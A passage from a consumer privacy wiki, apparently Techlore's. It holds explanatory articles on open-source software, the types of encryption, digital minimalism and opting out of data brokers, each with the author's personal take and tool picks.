chat, Signal strips the EXIF data on the way out. So when I need to send someone a photo without GPS coordinates before posting it somewhere, I never need a dedicated tool. I just send the photo to myself on Signal then use the clean copy from there. --- ## ✅ Henry's Picks Metadata is a property of how every tool you already use handles your data. My picks are the ones designed with metadata minimization as an explicit goal. - [**Signal**](https://signal.org): Architected to retain almost nothing about who talks to whom. Bonus: the Note-to-Self chat is the simplest way to strip EXIF from a photo before sharing it elsewhere. Send the photo to yourself, save the clean version, use that. - **Encrypted DNS**: Closes one of the loudest metadata channels in everyday browsing: every domain you visit becoming visible to your ISP. - **A trustworthy VPN**: Shifts which network operator can see your traffic metadata. Not anonymity, but a meaningful reshuffle of who sees what. Compare providers at the [VPN Finder](https://vpn.techlore.tech). - **Email aliasing**: Cuts down on the cross-service correlation that builds up when one email address is attached to everything you sign up for. See the broader recommendation set at [Techlore's SPA Tools](https://tools.techlore.tech/). ### Open-Source Software and Privacy: What FOSS Is and Why It Matters URL: https://techlore.tech/open-source-software-and-privacy-what-foss-is-and-why-it-matters/ Last updated: 2026-07-19T02:02:38.000Z ## 📖 The Basics ### What It Is FOSS stands for **Free and Open-Source Software**. The "free" doesn't necessarily mean free of charge, it means *free*dom. Freedom to use the software for any purpose, to study how it works, modify it, and share it. "Open source" refers to the source code being publicly available so you can see exactly how everything works. Anyone with the technical ability can read it, inspect it, and build on it. The opposite is **proprietary software**: closed-source code, controlled by an entity, where the terms of use are restrictive and the internal workings are hidden. You can use it, but you have no independent way to verify what it actually does. ### How It Works #### Auditability By Design The practical difference between open and closed source for privacy is generally **auditability**. When software is closed source, you're taking the company's word for what it does. If a proprietary messaging app claims it doesn't log your conversations, or a proprietary password manager claims your vault is encrypted before it ever leaves your device—those are just claims that are challenging to verify. You can read their privacy policy, you can do traffic inspection, you can reverse-engineer, but you can't just read the code. When software is open source, claims can be checked. Security researchers, independent auditors, and even skilled users can more easily verify whether the software actually behaves as described. Open source also means security researchers from around the world can find and report vulnerabilities, rather than leaving that work entirely to an internal team with potential conflicts of interest. #### Open Source Isn't a Guarantee of Safety Open source is great, but it's not a guarantee of safety. GitHub is full of abandoned open-source projects with unpatched vulnerabilities that are dangerous to use. Some projects are built by well-intentioned developers whose code hasn't been independently reviewed. Being open source means the code *can* be audited. It doesn't mean it *has* been. [Heartbleed](https://en.wikipedia.org/wiki/Heartbleed) is a common example. Disclosed in April 2014, it was a critical memory-disclosure vulnerability in [OpenSSL](https://www.openssl.org), the open-source cryptography library that powered nearly two-thirds of secure websites on the internet at the time. The bug had been present in the code undetected for almost two years, and was likely exploited in the wild before anyone caught it. When it was found, it required emergency patching across millions of servers globally. OpenSSL's code was publicly visible the entire time. The lesson isn't that open source failed. It's that visibility alone doesn't substitute for active, funded, professional review. When evaluating any open-source privacy tool, independent security audits by professional third parties carry more weight than the fact that the repository is public. #### Source-Available Software This is code that's publicly readable. You can inspect it, but the license restricts what you can do with it. You can't freely modify it, redistribute it, or use it for certain purposes without permission. It sits between fully open source and fully proprietary. From a privacy verification standpoint, source-available is still helpful since independent researchers can audit the code. But it doesn't carry the same ecosystem guarantees as true FOSS since it has no forking rights, no community redistribution, and the company can close access at any time. #### Even Trustworthy Open-Source Can Be Compromised Even audited, trustworthy open-source software can be compromised. In early 2024, [a backdoor was discovered in XZ Utils](https://en.wikipedia.org/wiki/XZ%5FUtils%5Fbackdoor), a compression library present on millions of Linux servers. A contributor had spent two years making legitimate commits and building trust before inserting hidden malicious code. It was caught before broad deployment almost entirely by chance, when a Microsoft engineer noticed unusual performance behavior during unrelated debugging. The code was open and public throughout. So again: open source improves your ability to verify, but a healthy project also needs active maintainership, community scrutiny, and ideally funded security review. #### How do open-source projects make money? The word "free" can cause confusion. Many open-source projects are free of charge, but many aren't, and many sustain themselves through real business models. Common ones: dual-licensed software where commercial use requires a paid license (used by some database and dev-tool projects); paid hosted versions of self-hostable software (Bitwarden, Nextcloud, Mastodon hosting services); enterprise support contracts (the Red Hat model); donations and recurring memberships (the Signal Foundation, the Tor Project); sponsorships from companies that depend on the project; and direct paid features layered on top of a free open-source core. Open source describes the license, not the price tag. Some of the most reliable privacy tools in this wiki are open source *and* paid, and that's often a healthy sign that someone is being paid to maintain the project. --- ## 🎯 Why It Matters When you're choosing tools to protect your data, you cannot read the minds of the people who built the software. You often can't verify claims about data collection, encryption implementation, or what gets logged where. Open source doesn't solve this completely, but it changes the nature of the trust relationship. With a closed-source app, trust is categorical: you either believe the company or you don't. With a well-maintained, independently audited open-source tool, trust is grounded in evidence that others have examined the code and confirmed it behaves as claimed. For tools like password managers, encrypted messaging apps, VPNs, browsers and more, this can seriously matter since the entire goal of these tools is to verify—not trust. The common framing used throughout this wiki when evaluating tools: - Is it open source? - Has it been independently audited by a qualified third party? - What's the business model? - What does the developer actually have to gain? - Who controls distribution? These aren't checkboxes that produce a pass/fail score, but they're signals of how trustworthy something that's about to handle your data really is. There will be situations where the best practical option for you isn't open source. The goal is accurate evaluation and risk-reduction, not ideological purity. --- ## 💡 Common Misconceptions ### "If it's open source, it's automatically safe." Heartbleed sat in publicly visible OpenSSL code for two years undetected. The [XZ Utils backdoor](https://en.wikipedia.org/wiki/XZ%5FUtils%5Fbackdoor) was committed openly over nearly two years before being caught largely by luck. Open source is a prerequisite for verification, not verification itself. A healthy project also needs active maintainership, funded review, and meaningful community scrutiny. ### "If it's proprietary, it can't be trusted at all." Closed source is harder to verify, but it's not impossible. Apple is the cleanest example: Independent reverse engineers, security researchers, and traffic-inspection tools have *both* confirmed parts of Apple's security claims and caught the company shipping telemetry that's supposed to be off. The closed nature of the platform makes the work harder, but it's still possible to do. ### "I don't use any open-source software." Most people use FOSS without realizing it. WebKit, the engine inside Safari, is open source. Many modern VPNs run on WireGuard, which is open source. WhatsApp's encryption uses the Signal Protocol which is open source. The infrastructure under a lot of what people use every day is already FOSS. ### "If the code is public, I know what's actually running." A public repository shows you what the developers chose to publish, it doesn't tell you what's deployed on their servers. A company can open-source their backend code and run a completely different build in production. The only tools that fully escape this are ones that run locally on your device with no server component, or that use end-to-end encryption specifically designed so the server can't access your data regardless of what it's running. Client-side code has a version of the same problem. Even when a browser extension or desktop app is open source, you're normally installing a compiled binary, not building from the code directly. So unless the project supports [reproducible builds](https://reproducible-builds.org/), a technique that lets you independently verify a compiled binary matches the published source, there's a potential gap between the code you see online and the software you're installing. Reproducible builds are rare and challenging to pull off, but are the gold standard of trust when achieved. Despite these facts, open source is still valuable. A project that publishes its code invites scrutiny, builds accountability, enables forking, and makes meaningful claims harder to walk back publicly. ### "Open source means the security is solid." Open source describes the license and the visibility of the code. It says nothing about the quality of the decisions made inside it. A project can be fully open, extensively audited, and still not implement memory-safe practices, exploit mitigations, forward secrecy, or any number of techniques that could make the software safer to use. Those are separate engineering questions with separate answers. The license is a starting point for trust. What the software actually does with that trust is a different question entirely. ### "Source-available is just proprietary with extra steps." Source-available code can still be read, inspected, and independently verified, which I see as the core privacy benefit FOSS delivers. What gets lost is licensing freedom: community forking, redistribution, modification. That's a real loss, but it's not equivalent to closed source. I believe source-available is meaningfully closer to open source than to proprietary, and dismissing it outright skips over real progress. --- ## 🗣️ Henry's Take In my life: roughly seventy to eighty percent of what I use is open source, it's what I prioritize when solid options exist. The remaining slice is proprietary, which I'm at peace with. DaVinci Resolve, the video editing software, is a common example I give. It runs offline, isn't handling sensitive data, and produces noticeably better edits than the open-source alternatives I've tried. The transparency arguments for FOSS matter a lot less with offline software not handling sensitive data. So I use it. The question I like to ask is "what would the open-source label actually change for this specific use case?", not "is the license sufficiently pure?" For the things that genuinely matter like messengers, password managers, VPNs, and browsers...open source carries enormous weight since verifiability is the foundation everything else depends on. Source-available deserves a quick comment too: it gets dismissed in many circles as pointless, but I don't think that's fair. The license is a real downgrade from FOSS since you lose modification rights, redistribution, and the ability to fork, but the core practical benefit (independent researchers being able to read the code and verify the claims) is still largely preserved. It's not where I want a project to land long-term, but I think it's a mistake to dismiss it altogether. --- ## ✅ Henry's Picks These are tools where being open source meaningfully strengthens what they're offering. - [**Signal**](https://signal.org): Fully open source, regularly audited, reproducible builds on supported platforms. The protocol underneath is itself open source and is even used inside apps that aren't. - [**KeePassXC**](https://keepassxc.org): Fully open-source local password manager. No servers, no trust beyond the code itself. - [**Bitwarden**](https://bitwarden.com) and [**Proton Pass**](https://proton.me/pass): Open-source synced password managers when local-only doesn't fit your life. - [**Mullvad VPN**](https://mullvad.net), IVPN, Proton VPN and Windscribe: Open-source VPNs, with WireGuard underneath. Compare open-source status side by side across providers at the [VPN Finder](https://vpn.techlore.tech). - [**F-Droid**](https://f-droid.org): Android app store that distributes only FOSS, with reproducible-build verification on supported projects. If you're looking for a FOSS alternative to a specific proprietary tool, [**AlternativeTo**](https://alternativeto.net) is a great reference to keep bookmarked. It has an open-source filter to help you find things quickly. See the broader recommendation set at [Techlore's SPA Tools](https://tools.techlore.tech/). ### How Encryption Works: End-to-End, At Rest, and Client-Side Explained URL: https://techlore.tech/how-encryption-works-end-to-end-at-rest-and-client-side-explained/ Last updated: 2026-07-19T02:00:58.000Z ## 📖 The Basics ### What It Is Encryption is the foundational layer beneath most privacy and security tools. When [Signal](https://signal.org) says your messages are private, when your browser shows a padlock, when a password manager says your vault is protected: they're typically communicating something about their encryption. Not all encryption is equal, and understanding what it does and doesn't do is what separates an educated decision from a marketing one. ### How It Works There are two fundamental types of encryption: #### Symmetric Encryption Uses the same key to encrypt and decrypt data. The analogy is a locked box where the sender locks it, the recipient unlocks it, and both use an identical key. It's fast and efficient, which makes it ideal for encrypting large amounts of data. The current base standard is **AES-256** (Advanced Encryption Standard with a 256-bit key). While it's considered strong, the problem with symmetric encryption is key distribution, since if you want to send someone an encrypted message, how do you share the key with them in the first place? Sending the key alongside the message defeats the purpose. #### Asymmetric Encryption This solves the core issues with symmetric encryption. Instead of one shared key, each party has a *pair*: a public key they share openly, and a private key they never share with anyone. Data encrypted with someone's public key can only be decrypted with their corresponding private key. The analogy: imagine a mailbox with a slot in the front. Anyone can drop a letter through the slot (encrypt with the public key), but only the person with the physical key to the box can retrieve and read what's inside (decrypt with the private key). You can hand out copies of the slot design to everyone you know—it doesn't matter, because the slot doesn't help anyone get the letters out. **RSA** is the most widely known asymmetric algorithm, with RSA-2048 as a current minimum standard and RSA-4096 recommended for stronger security. **ECC** (Elliptic Curve Cryptography) is increasingly common. It achieves strong security with significantly shorter keys, making it well-suited for mobile devices and performance-sensitive applications. In practice, asymmetric and symmetric encryption are typically used together. Asymmetric encryption handles the key exchange, then symmetric encryption (much faster) takes over for the actual data transmission. ### The Common Terms You'll Hear About Most Not all encryption is equal, and the difference between these terms has real consequences for what's actually protected. #### Encrypted In Transit This means data is encrypted while traveling between your device and a server. Think of an armored truck moving between two locations. HTTPS on websites is a common example, the lock icon in your browser indicates the connection to the site is encrypted. What it does *not* mean: the site itself is trustworthy, or that the data isn't readable once it arrives at the server. The website still decrypts it and can read everything. #### Encrypted At Rest This means data is stored in encrypted form on a hard drive, on a server, in a database, etc. It protects against unauthorized access to the physical storage medium. If a company's server is breached but the data is encrypted at rest with keys the company controls, the stolen data may be unreadable to the attacker. However, the company still holds the decryption keys. If they're compelled by law, breached in a more targeted way, or choose to access your data themselves, the encryption doesn't prevent your data from being accessed. #### Client-Side Encryption (CSE) This is sometimes also called zero-knowledge encryption, it means data is encrypted on your device before it ever reaches the provider's servers. In this situation, the provider doesn't hold a key that could be handed over in a court order or extracted in a breach. Many privacy-respecting storage and backup services implement this: [Bitwarden](https://bitwarden.com), [Proton Drive](https://proton.me/drive), [Cryptee](https://crypt.ee), and other tools encrypt your data locally before syncing it. The one caveat: "client-side encryption" doesn't specify *who* controls the encryption keys. Some implementations derive your key entirely from a password only you know, so the provider genuinely cannot recover your data. Others build in account recovery mechanisms that require some access to key material. The label alone doesn't tell you everything, but CSE tends to have higher standards for user safety. #### End-to-End Encryption (E2EE) This takes client-side encryption into the communications context (think messaging your friend) for a specific guarantee: only the sender and the recipient(s) hold the keys. The service provider in between sees only ciphertext they cannot reverse, because they never possess the keys at any point. The distinction from general CSE is architectural: in E2EE, the keys are derived from both parties' keys (like you and a friend), so the provider in the middle can't read them. This is the meaningful standard for private communications. #### Device/Disk Encryption This is when you personally encrypt the contents of your phone or computer so they're unreadable without your PIN or password. This is encryption at rest for your own devices. Mobile devices default to this the moment you set a password; laptops vary as Windows offers BitLocker as an option, macOS uses FileVault, and Linux distributions ask during install whether to enable LUKS. Device encryption protects you if the device is physically stolen or seized, because the raw storage is scrambled without your credential. It does not protect data once the device is unlocked and apps are running. --- ## 🎯 Why It Matters In 2020, a cyclist in Gainesville, Florida named [Zachary McCoy received a letter from Google's legal team](https://www.nbcnews.com/news/us-news/google-tracked-his-bike-ride-past-burglarized-home-made-him-n1151761). Police had submitted a geofence warrant, a demand requiring Google to identify every device near a specific location during a specific time window. A home had been burglarized; McCoy's route had taken him past that address multiple times, and Google Maps had been recording his location throughout. McCoy wasn't hacked. Google's systems weren't breached. The problem was that his location data sat in Google's systems in a form Google could still read. Had his location data been stored in a way that Google's servers couldn't decrypt, there would have been nothing to hand over. Google likely stores this data encrypted at rest, but *not* with any kind of client-side encryption that would put someone like Zachary in control of their keys. This is the core argument for encryption: **when a service can read your data, so can anyone with the legal authority, or the leverage, to make them produce it.** Encryption that the provider cannot break means a hacker has nothing useful to steal from the provider, as it's meaningless without a key only you hold. This shifts power into your court. For communications, the stakes are similar. Standard SMS messages are not encrypted end-to-end. They pass through your carrier's systems in readable form and can be legally requested, subpoenaed, or in some cases intercepted without a warrant depending on jurisdiction. The content of a Signal message, by contrast, cannot be produced by Signal even if ordered to do so, not as a policy choice but as a technical fact. One more thing worth saying plainly: there is an ongoing political effort by law enforcement and intelligence agencies in several countries to mandate "exceptional access" to encrypted systems...they want a backdoor the good guys can use. The technical community's response has been consistent for decades: [it cannot be done safely](https://www.eff.org/files/2025/08/19/the%5Fcrypto%5Fwars.pdf). A weakness built into an encryption system is a weakness for everyone, including criminals, foreign adversaries, and the very people the government claims to be protecting. There is no door that opens only for the right key. When you hear officials describe encryption as "going dark" or argue that privacy tools help criminals, what they're actually asking for is the ability to undermine a system that protects billions of people's financial records, health data, private communications, and personal safety. The fact that strong encryption exists and is in wide use is not a policy failure. It's one of the most important infrastructure wins in the history of the internet. Encryption is what makes every core protection in this wiki provable rather than theoretical. A VPN without encryption would just be rerouting. A password manager without encryption would just be a list. All of these tools are, at their core, encryption applied to a specific problem. Understanding what encryption actually delivers gives you a reliable way to evaluate what a tool is providing when it claims to protect your privacy. --- ## 💡 Common Misconceptions ### "Encryption is encryption." There's a real difference between *encryption in transit*, *encryption at rest*, *client-side encryption*, and *end-to-end encryption*. Each one removes a different party from the trust chain. A service that advertises "encryption at rest" still holds the keys and can decrypt your data on demand. The vocabulary is similar, the guarantees are not. ### "Encryption only matters if you have something to hide." The Zachary McCoy story in the section above demonstrates how this falls apart. He had done nothing wrong, and still ended up under criminal suspicion because his location data sat on Google's servers. Encryption isn't about hiding wrongdoing, it's about reducing the number of parties who can access your data without your permission. Nobody expects a third-party to listen to your private conversations at the dinner table, so why should the internet be any different? ### "Encryption requires advanced tools." Most people already have access to genuinely strong encryption and haven't enabled it. Apple's Advanced Data Protection turns on E2EE for nearly all of iCloud with one toggle. Modern phones encrypt their storage the moment you set a passcode. Signal is free. macOS ships with FileVault ready to be enabled for disk encryption, and Microsoft does the same with BitLocker. Most of the work happens by turning on the encryption that's already available. ### "If I can't migrate everything, there's no point." You don't have to abandon Google Drive to start using an encrypted alternative. Having one safe space ready like a Proton Drive account, an encrypted notes app, or a Signal thread with the right people means that when something sensitive comes up, you already have somewhere to put the data. Set it up before you need it, and over time you can progressively use it more. ### "Quantum computers will break all encryption anyway." Powerful quantum computers could someday break the specific mathematical problems that today's most common encryption algorithms rely on. That's a valid concern, but the response is already underway. [NIST finalized its first post-quantum cryptographic standards in 2024](https://www.nist.gov/news-events/news/2024/08/nist-releases-first-3-finalized-post-quantum-encryption-standards), and major platforms are actively migrating. [Signal](https://signal.org/blog/pqxdh/) and iMessage have already integrated a post-quantum layer into their protocols. Proton Mail and Tuta Mail have also introduced post-quantum encryption. And many people would argue that even current encryption standards are still quite resistant to quantum computers. The threat is long-range, the defenses are being built, and unencrypted data offers zero protection against any adversary, so you might as well get yourself encrypted. --- ## 🗣️ Henry's Take End-to-end encryption isn't about distrusting the company you're using. It's about fighting the reality that even if you trust them, you also have to trust their third-party contractors, every engineer with database access, anyone who phishes one of those engineers, anyone who breaches the company's systems, and anyone with the legal authority to compel disclosure. You can fully trust the company and still want all of those other actors out of the equation. That's the actual benefit encryption can provide! The most practical workflow for people who don't want to overhaul their digital life is quite simple. If you're in Apple's ecosystem, turn on [Advanced Data Protection](https://support.apple.com/en-us/108756). That single toggle moves the encryption keys for nearly all of iCloud onto your devices, away from Apple. ADP currently doesn't cover Mail, Contacts, or Calendar, which is where [Proton](https://proton.me) or [Tuta](https://tuta.com) closes the gap. Layer Signal on top for messages, and most people end up with \~80-90% of their digital life sitting behind encryption. None of this requires changing how you work day-to-day. If you're outside of Apple's ecosystem, you'll need to hand-pick your favorite tools that can provide a similar amount of coverage. The last thing I'll say is don't try to be perfect about it. You don't have to abandon Google Drive to start using [Proton Drive](https://proton.me/drive). Just have the encrypted alternative ready. When something genuinely sensitive comes up like a contract, a medical record, or a draft of something you don't want anyone else seeing—then your safe space is ready to go. Set up the safe spaces, and you'll find yourself reaching for them more and more. --- ## ✅ Henry's Picks These are the encryption layers worth setting up for most people, in roughly the order they pay off. - **Device encryption**: Full-disk encryption on every device. Mobile devices do this automatically the moment you set a passcode. - [**Signal**](https://signal.org) or another encrypted messenger: End-to-end encrypted messages and calls. - **A password manager** like [Proton Pass](https://proton.me/pass), [Bitwarden](https://bitwarden.com), or [KeePassXC](https://keepassxc.org). Your vault should be encrypted with a key only you hold. - **Apple Advanced Data Protection**: If you're in the Apple ecosystem, [turn it on](https://support.apple.com/en-us/108756). It moves iCloud encryption keys onto your devices. Still doesn't cover Mail, Contacts, or Calendar. - [**Proton**](https://proton.me) **or** [**Tuta**](https://tuta.com): Closes out the Mail, Contacts, and Calendar gap that ADP leaves. Either one, combined with ADP, gives most people end-to-end encryption across most of their digital life. - [**Cryptomator**](https://cryptomator.org): Client-side encryption you can stack on top of any cloud service that doesn't offer E2EE. Useful for getting cheap commodity storage (Google Drive, Dropbox) with the privacy properties you actually want. - [**VeraCrypt**](https://veracrypt.fr): Encrypted volumes on local storage for cases where standard device encryption isn't enough. Also offers full-disk encryption for some operating systems. See the broader recommendation set at [Techlore's SPA Tools](https://tools.techlore.tech/). ### Digital Minimalism: Why Fewer Accounts and Apps Protect You More URL: https://techlore.tech/digital-minimalism-why-fewer-accounts-and-apps-protect-you-more/ Last updated: 2026-07-19T01:59:27.000Z ## 📖 The Basics ### What It Is Digital minimalism, in a privacy and security context, is the practice of deliberately reducing the number of apps, accounts, services, and digital relationships you maintain, keeping only what genuinely earns its place. It isn't asceticism. The tools introduced throughout this wiki like password managers, aliasing services, encrypted messengers, and encrypted storage all involve creating accounts and building digital relationships. The difference is those relationships are working for you. Digital minimalism is about the distinction between services that serve your interests and those that extract from them. ### How It Works Every account you create is a data relationship. You hand over your email address, your name, sometimes your location, your usage patterns, your payment information—and in exchange you get access to something. If you stop using the service, you stop getting value from the relationship, but the service doesn't stop getting value from yours. The data persists. The account persists. And if that service is ever breached, you're in the breach database. This is what I call the zombie account problem: accounts you created, stopped using, and forgot about, but which still exist, still hold your personal data, and still represent live exposure. In March 2018, Under Armour announced that [MyFitnessPal had been breached](https://www.engadget.com/2018-03-29-under-armour-data-breach-affects-150-million-myfitnesspal-users.html) with 150 million accounts exposed. A significant number of those users had the same reaction when the news broke: not panic, not anger, but confusion. "Wait, I have a MyFitnessPal account?" #### The Multiplier Effect Apps and services rarely hold your data in isolation. A fitness app shares data with analytics providers. A retail site shares purchase history with data brokers. A news site shares reading habits with advertising networks. When you reduce the number of services you use, you're not just cutting direct data relationships, you're cutting the entire downstream web of data sharing you never explicitly agreed to. #### The Intentionality Framework The evaluation question for any app or account is simple: does the value this gives me justify what I'm handing over? That calculation is personal and context-dependent. An offline tool that collects nothing might be worth keeping even if rarely used. A social platform that collects substantially might be worth keeping if it's genuinely where you maintain relationships that matter. The point isn't to minimize for its own sake, it's to make the decision consciously rather than by default. For new signups, the equivalent habit is a brief pause before handing over data: do I actually need an account here? Can I use this without one? Can I use alias information? Is there a less invasive alternative? This is the difference between passive accumulation and intentional choice. #### Where To Start - *Apps on your devices*: open your phone and work through one screen at a time. The question for each app: have I used this in the last 90 days? Does what it gives me justify what it takes? If either answer is no, delete it. For accounts attached to those apps, note them for cleanup, since closing the account, not just deleting the app, is what actually removes the data relationship. - *Existing online accounts*: a [JustDeleteMe](https://justdeleteme.xyz) search or a [Have I Been Pwned](https://haveibeenpwned.com) check often surfaces accounts you'd forgotten. The goal is to find and close accounts that no longer serve you before they appear in the next breach. Prevention is always easier than cleanup. - *New signups going forward*: the moment of signup is the moment to ask whether the account is necessary. This doesn't mean refusing all new digital relationships, it just means making the decision consciously rather than habitually. #### The Difficult Tensions Some services are genuinely useful and might be worth the tradeoff. A social platform that hosts a community you care about might be worth the drawbacks. Digital minimalism isn't about winning a contest to have the fewest accounts, it's about being deliberate, and being honest when a service earns its place. It also has an attention dimension that's worth naming. Every app on your phone is a small claim on your time. Every notification is an interruption someone engineered for their benefit. Every subscription is a background obligation your brain tracks. Reducing that load isn't just a privacy benefit—it frees up the time and attention needed to actually implement and maintain the other protections in this wiki. --- ## 🎯 Why It Matters The data minimization principle is the philosophical foundation underlying the entire SPA approach. A VPN conceals your traffic from your ISP. An alias conceals your real email from services. Browser hardening reduces fingerprinting. All of these are meaningful protections for the data you generate through active use, and this is just the more direct version of that same philosophy. Each service you don't use represents data that cannot be in that service's breach. A password you don't have at a service cannot be credential-stuffed from that service's breach database. An address you didn't give a data broker cannot appear in their profile of you. The protections that start with not creating the exposure in the first place compound in ways that no downstream tool can fully replicate. Fewer services means fewer vectors regardless of which one an adversary might target. And it's easier for you to keep track of your digital life and make better quality decisions. The goal is a deliberate digital life, where you know what you've signed up for, why you're still using it, and what you're trading. This is what actually puts you back in the driver's seat of your digital life. --- ## 💡 Common Misconceptions ### "Digital minimalism means I have to go all-in." It doesn't. The framing as a binary is what makes the practice feel inaccessible and ultimately gets abandoned. Deleting three apps you don't use is digital minimalism. Closing one zombie account is digital minimalism. Pausing for ten seconds before creating an account to ask "do I actually need this?" is digital minimalism. The threshold is not "live with a flip phone." It's "have I made any of these decisions deliberately rather than by default?" ### "Adding privacy tools to my setup contradicts digital minimalism." An aliasing service is technically more software in your stack. It's also the thing that removes your real email address from countless future signups. Whether it counts as more digital exposure or less depends entirely on the lens you're looking through. The same logic applies to password managers, encrypted messengers, and most of the other tools this wiki recommends—they add a relationship in exchange for collapsing many smaller ones. That's the kind of exchange minimalism is built to evaluate. ### "Digital minimalism means using as few devices as possible." There are people for whom one phone and one laptop is the goal—every function consolidated onto the minimum hardware. There are also people for whom intentionality is the goal—a desktop for work, a tablet for reading, a separate phone for personal use, each device with a clear and bounded role. The first school minimizes hardware. The second school minimizes ambiguity. Both are legitimate forms of digital minimalism. The right one for you depends on which kind of overhead you're trying to reduce. --- ## 🗣️ Henry's Take Digital minimalism is one of the topics where my own strategies have shifted over time, both with software and hardware. Early in my journey I wanted to use *as few* accounts and services as possible—even the ones that were designed to help me. This led to me utilizing drastically inefficient workflows, experiencing data loss, and it ironically gave me *less* control of my digital life because of the overhead. On the hardware end I was the same way: I only had one phone & one laptop, and every workflow consolidated to minimize the hardware count as far as it would go. What I learned is that this form of minimalism (for me) made it harder, not easier, to keep the categories of my digital life separate from each other and simple to manage. So over time, I changed my approach: I got a desktop for one purpose, a laptop for travel, an iPad for entertainment, a phone for personal life, and intentionality about which device serves which function. I also fully embraced the tools that were designed to help me on my journey: data removal services, multiple browsers for different use-cases, cloud-synced TOTP apps, and the list goes on. I now have more total devices and more total software than I did five years ago, but I'm also more confident that each piece of it earns its place, and the relationships I have with services are more deliberate than they used to be. I think minimalism is going to mean very different things to different people. The constant between the approaches is it should always revolve around building a habit to understand what each digital relationship actually entails, and being willing to walk away from the ones that don't earn their place. --- ## ✅ Henry's Picks Digital minimalism is mostly a practice, not a product. The tools that help are the ones that surface where your existing exposure lives and the ones that reduce friction at the moments you'd otherwise default to maximum sharing. [**Have I Been Pwned**](https://haveibeenpwned.com): search your email address against known breaches. The first time you run this is often the moment a list of forgotten accounts becomes visible. Free. Run it for every email you've used historically, not just your current one. [**JustDeleteMe**](https://justdeleteme.xyz): a directory of account deletion processes for thousands of services, sorted by difficulty. **Email aliasing**: the single most leveraged habit for new signups going forward. Every alias is a relationship you can sever cleanly. Pairs naturally with a password manager that handles the alias generation at signup time. **Data broker removal**: the maintenance layer for the data already out there. Pair this with prevention upstream or it stays a treadmill. [**Cal Newport, *Digital Minimalism***](https://calnewport.com/my-new-book-digital-minimalism/): the foundational text on intentional technology use. Not a privacy book in the strict sense, but the framework it builds is the same framework that makes the privacy version of this article work. Worth reading if you want the philosophical version of what this article is the operational version of. See the broader recommendation set at [Techlore's SPA Tools](https://tools.techlore.tech/). ### How to Remove Yourself from Data Brokers and People-Search Sites URL: https://techlore.tech/how-to-remove-yourself-from-data-brokers-and-people-search-sites/ Last updated: 2026-07-19T01:58:18.000Z ## 📖 The Basics ### What It Is Data brokers are companies whose business is collecting personal information from dozens of sources, organizing it into profiles, and selling access to those profiles to whoever will pay. Most people have never heard of these companies and never signed up for them, but they have your information anyway. People-search sites like [Spokeo](https://www.spokeo.com/), [Whitepages](https://www.whitepages.com/), [BeenVerified](https://www.beenverified.com/), [Intelius](https://www.intelius.com/), and countless others are the consumer-facing layer of this industry. Visit one, type in a name and city, and you'll typically find a home address, phone number, family members, estimated income range, and a list of previous addresses. No account required. No authorization check. Available to anyone. Opting out of these sites and the brokers feeding them is one of the few reactive tools available to limit how much of this information is accessible. It doesn't solve the underlying problem, but it raises the effort required for anyone trying to find detailed personal information about you. ### How It Works #### Where Data Brokers Get Their Data The sources are legal, largely public, and mostly unavoidable in modern life: - Property records: when you buy or rent a home, the transaction creates public county records containing your name and address. - Voter registration databases: publicly available in most US states. - Court filings: civil and criminal court records are generally public. - Business filings: if you've registered an LLC or been listed as a registered agent, your name and address are in state records. - Marketing databases: purchase histories from retailers, magazine subscription records, loyalty card programs. - Social media scraping: publicly visible profile information. These sources feed directly into broker databases, and from there, brokers sell to each other. The result is an ecosystem where your information compounds across hundreds of companies. And the worst part is you didn't intentionally create a relationship with a single one of these companies. #### People-Search Sites Explained People-search sites sit at the consumer-facing end of the broker ecosystem. They package broker data into searchable interfaces designed for easy lookup of individuals. When someone searches for you on Spokeo or Whitepages, they're querying a database compiled from dozens of brokers, displayed with a clean UI. #### The Two Main Removal Methods 1. *Manual opt-out*: most major people-search sites have an opt-out process. You find your listing and submit a removal request. This can be effective, free, and gives you direct control. But the friction is intentional: opt-out forms are buried, processes vary by site, and you need to work through each one individually. The most comprehensive resource for working through this manually is the [**Big Ass Data Broker Opt-Out List**](https://github.com/yaelwrites/Big-Ass-Data-Broker-Opt-Out-List) on GitHub, which documents brokers with direct opt-out links and prioritizes the highest-impact sites. 2. *Automated removal services*: services that monitor broker databases and submit removal requests on your behalf on an ongoing basis. They typically charge subscription fees and vary significantly in effectiveness. A [Consumer Reports study](https://www.consumerreports.org/electronics/personal-information/services-that-delete-data-from-people-search-sites-review-a2705843415/) published in August 2024 tested seven removal services across 32 volunteers over four months and found the category largely underperforms its promises, though some services measurably outperformed others. I'll discuss these later in the article. #### A Cost-Effective Hybrid Workflow There's a clever approach that gets you most of the benefit of an expensive full-service plan for a fraction of the cost. The trick is to separate *discovery* from *removal*. [Optery](https://www.optery.com)'s free plan produces a detailed exposure report (with screenshots) showing exactly which data brokers are listing your information, without charging you anything. You can use that report as a free, comprehensive map of where you're exposed. Then, instead of paying for Optery's premium removal service, you do the actual removals through a much cheaper service like [EasyOptOuts](https://easyoptouts.com) (\~$20/year), or manually using the exposure report as your checklist. #### The Fundamental Limitation of Removal Data reappears. When your county records a new property transaction, when you register a vehicle, when you appear in a court filing, those events feed back into broker databases. A site you successfully removed yourself from in January may have a fresh listing by July, compiled from new public record aggregation. Removal is not a one-time fix. It's maintenance. #### The Regulatory Landscape In California, the Delete Act (SB 362) introduced a centralized [**Delete Request and Opt-Out Platform (DROP)**](https://privacy.ca.gov/drop/), a single submission that triggers deletion requests to all registered data brokers, with mandatory broker processing beginning August 1, 2026\. Brokers must check the platform every 45 days and delete matching records within 45 days. Outside California, state laws vary considerably in scope and enforcement. [GDPR](https://commission.europa.eu/law/law-topic/data-protection/data-protection-eu%5Fen) provides stronger removal rights for EU residents than most US frameworks. More legal activity in this space would give users meaningful control over an industry that has operated without it for decades. --- ## 🎯 Why It Matters In August 2024, a breach at a company called [National Public Data](https://en.wikipedia.org/wiki/2024%5FNational%5FPublic%5FData%5Fbreach) exposed nearly 3 billion records that included full names, Social Security numbers, current and historical addresses, and phone numbers for what amounted to most of the living US population. By October 2024, the company filed for bankruptcy. Most people had never heard of National Public Data. Nobody had signed up with them. They had your information because aggregating and selling personal data was their business. The breach just made the exposure visible. This is the data broker industry operating as it normally does. The practical harms range across the spectrum of severity. At the annoying end: spam calls from numbers associated with your name, targeted mail from companies you've never interacted with. More seriously: employers finding information in background checks that shouldn't legally influence hiring decisions; insurance companies using broker profiles in underwriting; law enforcement agencies purchasing commercial location data to track movements without a warrant. At the dangerous end: stalkers using people-search sites to find victims who have worked to keep their addresses private; domestic abusers locating people who have fled. The data broker ecosystem doesn't distinguish between these use cases. Your profile is available to all of them through the same interfaces. Removal 